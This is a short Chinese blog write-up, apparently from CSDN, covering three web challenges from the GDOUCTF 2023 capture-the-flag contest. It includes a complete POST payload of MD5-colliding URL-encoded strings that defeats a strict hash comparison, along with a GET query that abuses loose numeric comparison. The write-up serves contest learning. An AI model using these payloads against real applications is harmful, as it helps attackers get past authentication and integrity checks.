GDOUCTF2023-web-wp

文章讲述了作者在与人交流后意识到自己在技术方面还需提升,讨论了一个涉及Snake游戏的Web挑战,重点包括查看源码、理解MD5强等性绕过、数字比较和cookie设置。通过POST和GET请求,以及在/F12源码中寻找线索,最终找到并获取了flag。
摘要由CSDN通过智能技术生成

目录

 

hate eat snake

受不了一点 

EZ WEB


今天和别人交流了一下,发现自己还有很长的路要走。

hate eat snake

15ba78e6578e42208e09fd3a1e770a00.png

常见的web游戏类型题,查看源码(右键检查,F12无用)

和通常贪食蛇游戏一样,有Snake对象

 f7738b62c8b6488fa9245e0578ce3b48.png

代码解读:在窗口加载对象Snake,对象标志为snakeId,所以控制该对象的方法(重用snakeId):

a73073f8b3bf4521abe6e4993c04f5da.png

 回到游戏按下空格,即得到flag。

受不了一点 

4e087a8fa94846edad319449ff9f695a.png

 知识点:md5强等绕过,数字比较,cookie设置,以及中间的if完全没管。。

post:

gdou=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&ctf=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2&flag=1

get:

/?aaa=114514&bbb=114514aaa&flag

9f626b770a454b1293cf881047d3d997.png

EZ WEB

 b1dee57a920e43d9a9234e0342803146.png

F12查看源码:

 386394edd1f64761958d4d2dd9cee7b1.png

访问/src

086dc99d31a14cf9b5c2ff8f61995ff8.png

用bp更改请求方式:

5ee9686702684fc4bfd0d1d7580c382b.png

得到flag

 

 

 

 

 

  • 7
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值